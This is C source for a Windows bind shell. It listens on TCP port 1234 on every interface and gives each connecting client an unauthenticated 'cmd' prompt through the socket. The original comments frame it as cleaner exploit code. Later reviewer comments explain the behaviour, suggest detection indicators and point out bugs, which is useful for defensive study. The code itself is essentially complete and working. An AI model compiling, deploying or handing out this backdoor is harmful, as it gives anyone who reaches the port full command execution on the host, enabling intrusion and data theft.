Simple multi-threaded code that spawns a command prompt on win32.
fb905034094e2423d323b670b2e31b316d61f5dadd627838561f0374cf37a54c
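// just simple and safe multi-threaded code that spawns a command prompt on a win32 system
// ("safe" presumably refers to handle cleanup only: the listener below accepts any
// connection without authentication)
// you might notice how all the junk exploits don't close handles properly ;)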
#include <stdio.h>
#include <windows.h>
#include <winsock2.h>
#pragma comment(lib,"ws2_32.lib")
/*
 * ThreadProc - per-connection worker that main() starts for each accepted socket.
 *
 * lpParameter is the accepted SOCKET value cast to LPVOID. The routine assigns
 * that value as the stdin, stdout and stderr handles of a new "cmd" process,
 * blocks until the process exits, then closes the process handle, the primary
 * thread handle and the socket. It ends with ExitThread(0) and never returns
 * to its caller.
 *
 * Review notes (defender's view):
 *  - Nothing in this routine authenticates or filters the peer before the
 *    process is created; the child runs under whatever account started this
 *    program.
 *  - Observable behaviour: a cmd child process whose three standard handles
 *    are a network socket, created with handle inheritance enabled. Process
 *    creation telemetry combined with the parent's listening socket is the
 *    natural place to detect this.
 *  - The CreateProcess result is not checked. On failure pi stays zeroed, so
 *    the wait and the two CloseHandle calls operate on NULL handles and only
 *    the closesocket() has any effect.
 */
DWORD WINAPI ThreadProc(LPVOID lpParameter)
{
PROCESS_INFORMATION pi;
STARTUPINFO si;
/* Zero both structures so every field not set below is 0/NULL. */
ZeroMemory(&si,sizeof(si));
ZeroMemory(&pi,sizeof(pi));
si.cb = sizeof(si);
/* The socket value is reused as all three standard handles of the child. */
si.hStdError = lpParameter;
si.hStdInput = lpParameter;
si.hStdOutput = lpParameter;
/* STARTF_USESTDHANDLES makes CreateProcess honour the hStd* fields above. */
si.dwFlags = STARTF_USESTDHANDLES;
/*
 * lpApplicationName is NULL, so the image is resolved from the command line
 * "cmd" through the normal search order rather than from an absolute path.
 * bInheritHandles is TRUE, which lets the child use the socket handle; it also
 * passes on every other inheritable handle this process holds.
 * NOTE(review): NULL is passed for dwCreationFlags, a DWORD; 0 is meant.
 */
CreateProcess(NULL,"cmd",NULL,NULL,TRUE,NULL,NULL,NULL,&si,&pi);
/* Hold this thread (and the connection) until the child process exits. */
WaitForSingleObject(pi.hProcess,INFINITE);
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
/* The connection is closed only after the child has terminated. */
closesocket((SOCKET)lpParameter);
ExitThread(0);
}
/*
 * main - TCP listener that hands every accepted connection to ThreadProc.
 *
 * Requests Winsock version 2.0, creates a TCP socket, binds it to INADDR_ANY
 * on port 1234, listens, and then loops on accept(). Each accepted socket is
 * passed to a new thread running ThreadProc; the thread handle is closed
 * immediately, so the thread runs unsupervised. Always returns 0, including
 * when startup, socket creation, bind or listen fail.
 *
 * Review notes (defender's view):
 *  - The listener is reachable on every local interface (INADDR_ANY) on a
 *    fixed port, TCP 1234, with no authentication, allow-list or transport
 *    protection anywhere in the accept path. An unexpected listener on that
 *    port owned by a process that spawns cmd is the indicator to look for.
 *  - There is no limit on the number of connections or threads.
 *  - NOTE(review): `char **argv[]` is not the standard main signature
 *    (`char **argv` / `char *argv[]`); argc and argv are unused here.
 *  - NOTE(review): `sockaddr_in` without the `struct` keyword looks like it
 *    only compiles as C++ - confirm the intended compiler mode.
 *  - `service` is not zero-initialised; only sin_addr, sin_port and
 *    sin_family are assigned before bind().
 */
int main(int argc, char **argv[])
{
WSADATA wsaData;
sockaddr_in service;
SOCKET server,client;
/* Everything below runs only if Winsock 2.0 initialisation succeeds. */
if((WSAStartup(MAKEWORD(2,0),&wsaData)) == 0) {
/* TCP socket created with dwFlags = 0. */
if((server = WSASocket(AF_INET,SOCK_STREAM,IPPROTO_IP,NULL,0,NULL)) != INVALID_SOCKET) {
/* Bind address: all interfaces, port 1234 in network byte order. */
service.sin_addr.S_un.S_addr = INADDR_ANY;
service.sin_port = htons(1234);
service.sin_family = AF_INET;
/* bind() and listen() return 0 on success, hence the negated tests. */
if(!bind(server,(SOCKADDR*)&service,sizeof(service))) {
if(!listen(server,0)) {
/*
 * Accept loop: runs until accept() fails. The documented failure value of
 * accept() is INVALID_SOCKET; the comparison here uses SOCKET_ERROR instead.
 * The peer address is not requested (both address arguments are 0), so the
 * program never sees or records who connected.
 */
while((client = accept(server,0,0)) != SOCKET_ERROR) {
/*
 * One thread per connection; the handle is closed at once because the thread
 * is never joined. The CreateThread result is not checked: on failure
 * CloseHandle receives NULL and the accepted socket is never closed.
 */
CloseHandle(CreateThread(NULL,NULL,ThreadProc,(LPVOID)client,NULL,NULL));
}
}
}
/* Reached when bind/listen fail or the accept loop ends. */
closesocket(server);
}
/* Paired with the successful WSAStartup above. */
WSACleanup();
}
return(0);
}